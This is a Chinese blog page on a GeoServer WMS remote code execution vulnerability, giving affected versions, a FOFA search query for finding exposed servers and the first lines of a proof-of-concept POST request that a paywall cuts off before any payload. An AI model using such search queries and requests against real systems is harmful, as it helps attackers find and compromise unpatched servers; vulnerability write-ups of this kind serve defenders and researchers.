GeoServer wms远程代码执行漏洞

已于 2024-03-26 15:36:50 修改
阅读量243 收藏
点赞数 5
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-26 15:09:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137047068
版权

简介

GeoServer是一个开源服务器,用于共享、处理和编辑地理空间数据。它支持多种地图和数据标准,使用户能够通过网络访问和操作地理信息系统(GIS)数据。

漏洞描述

GeoServer wms存在远程代码执行漏洞,攻击者可利用该漏洞通过在xml中包含格式错误的查询字符串的精心编制的payload,让远程恶意用户执行任意代码

Fofa语法与漏洞编号

FOFA:icon_hash=”97540678”
影响资产数量:1,355
 


CNVD漏洞编号:无

影响版本

GeoServer < 2.23.4

漏洞复现

POC

POST /geoserver/wms HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
GIS系列(四)GeoServer的介绍和用法
lz5211314121的博客
05-07 1万+
首先,GeoServer是一个地图服务器。 关于地图服务器,其实和普通服务器没啥区别,就是专门用来发布地图的。 实际上,如果你的项目是前后端结合的话,可以不需要地图服务器。 你可以在后端配合Geotools,postgis等直接把地理数据返回前端,前端再进行加载。 但是有的时候,数据量不是很大,或者说项目基本不需要后端。在或者说你是一个纯前端的项目,服务器只需要放置和发布地图。 那这个时候你就要用到Geoserver了。它可以帮助你把地图资源,地图数据源以服务的形式发布。 关于Geoserver
geoserver发布WMS,图层有SLD符号化
11-08
geoserver发布wms服务,用udig为shp文件做符号化,生成sld符号化文件
GeoServer入门(一):介绍、配置与安装(Java环境配置、Tomcat安装部署)
将登太行雪满山
05-12 2万+
GeoServer入门(一):介绍、配置与安装
GeoServer 安装教程
weixin_38170255的博客
08-21 1457
准备内容 安装环境:win10*64位专业版 安装文件:geoserver-2.15.2 安装步骤 安装JDK 1、安装GeoServer是基于Java的环境,所以需要先装Jdk环境。 2、前往官网下载Java SE http://www.oracle.com/technetwork/java/javase/downloads/index.html 3、接受协议并下载相应...
Geoserver简介
giser@2011的博客
07-31 2941
GeoServer,顾名思义,是一个“服务器”,用于编辑和发布地理控件数据。它是一款基于Java语言开发的,实现OGC标准的,支持用户浏览、编辑和发布地理空间数据的开源软件。它也是一款支持在Web上渲染显示二维地图,并且能够对其进行平移、缩放操作的GIS工具。
geoserver离线地图服务搭建和图层发布
敲代码的小小酥的博客
07-01 9410
geoserver发布多精度图层过程
GeoServer发布WMS等服务
06-06
如何发布数据等描述,简单的操作提示,geoserver发布wms wfs等服务
28.(leaflet篇)leaflet接入geoserver发布的wms服务.zip
08-06
下载如有问题,可私信博主。下载前建议先查看博客内容,其地址为: https://blog.csdn.net/QQ98281642/article/details/119443842
Mapbox加载wms
04-21
mapbox 加载wmsgeoserver发布之后加载,亲测可以行
Mapbox叠加Geoserver服务代码.txt
04-20
<!DOCTYPE html> 详见文档。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
GeoServer发布图层遇到的几个雷点及解决方案
夜郎King的博客
06-26 1万+
本文将紧密围绕图层编码导致图层预览无服务的异常问题、图层空间参考投影设置的问题、Qgis导出的SLD在GeoServer中发布预览报错的问题、GeoServer中多字段拼接联合标注问题,通过在GeoServer中以上4个问题的具体描述以及问题的针对性解决方案,让读者在实际操作中遇到以上问题时,知道如何去解决。
从零开始学GeoServer源码九(如何集成Cesium以实现预览3dtiles和terrain服务?)
xiangshangdemayi的博客
05-24 2629
这里写目录标题1.前言2.思路3.准备一个预览页面4.在静态页面准备一个a标签跳转并传值5.完善静态页面5.1 获取要预览服务的唯一编号previewId5.2 准备加载3dtiles和terrain的函数5.3 发ajax获取服务的url6. 补全预览页面需要的Cesium依赖7.看看预览时的效果8.总结 1.前言   在第七篇中我们讲了如何使用 GeoServer 发布 3dtiles 和 terrain 文件,在那一篇中,我们最终实现了发布功能,但预览功能还是需要在 Cesium 的工程里去手动添加预
GeoServer 基础使用
最新发布
tuxin1989的博客
09-21 1012
GeoServer 基础使用 发布WMS服务 发布WMTS服务
geonode geoserver win10 安装教程(亲测)
LEILEI18A的博客
02-16 2733
geonode win10 安装教程(亲测) 0. geonode简介 GeoNode 是一个地理空间内容管理系统,一个用于管理和发布地理空间数据的平台。它将成熟稳定的开源软件项目汇集在一致且易于使用的界面下,允许非专业用户共享数据并创建交互式地图。 1.相关链接 geonode-win10安装官方文档 geonode-github链接 youtube上也有相关的安装教程视频,但是无论官方文档还是youtube都存在着许多细节未描述,导致小...
GeoServer安装与配置(免安装版本)
m0_62431591的博客
07-17 1538
打开 geoserver/bin,运行startup.bat启动文件,.sh为linux机器的启动文件,启动完成后,打开浏览器,根据 本机ip+下载好的压缩包解压缩即可,打开文件夹后在start.ini中可以配置geoserver服务器端口:直接搜索 jetty.http.port。配置完上边的之后,打开 geoserver\bin,运行startup.bat启动文件,如果是linux使用.sh文件启动,打开浏览器。jetty.http.port = “你想配置的端口”,
GeoServer(地图服务器)
热门推荐
huangpengniubi的博客
12-28 3万+
本文章主要介绍geoserver的安装以及使用:   什么是geoserver?它是干什么的? GeoServer是一个server开源,允许用户查看和编辑地理数据,这是地理信息系统领域. GeoServer的安装:            下载地址: http://geoserver.org/download/ 对于包选择自己需要的进行下载,然后双击进行安装,跟常规安装一样,一直n...
GeoServer搭建私有地图服务,Cesium引擎加载。
qq_41400354的博客
01-05 2075
Cesium,GeoServer.解决地图变形,设置加载范围。TMS,WMS,WMTS
关于我在腾讯云买了个服务器,部署springboot、vue前后端分离系统的过程,涉及geoserver、tomcat、nginx ----项目部署篇
pigs_dream的博客
05-14 761
在/usr/local/tomcat/apache-tomcat-8.5.55/webapps下导入geoserver。编辑/usr/local/tomcat/apache-tomcat-8.5.55/webapps/geoserver/进入manager,登入tomcat tomcat,进入geoserver,登入admin geoserver。Nginx的可执行文件位于 /usr/local/nginx/sbin/nginx。打开下面几条跨域配置信息xml的注释即可,注意 in Tomcat.
geoserver wms 空间查询
08-23
GeoServer中,WMSWeb Map Service)是一种用于呈现地图图层的服务。它允许用户通过定义空间查询来获取特定地理区域的地图。空间查询可以通过CQL_FILTER参数来实现。引用中提供了一个示例URL,该URL展示了一个使用WMS空间查询的示例。其中,CQL_FILTER参数用于定义查询条件,而POINT(113.98933 22.59750)表示要查询的点的经纬度坐标。通过发送类似于引用中所示的URL请求,您可以获取包含特定点的要素的地图数据。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [geoserver安装包](https://download.csdn.net/download/m0_37659871/10498606)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [通过 geoserver 空间点查询](https://blog.csdn.net/geol200709/article/details/102819954)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值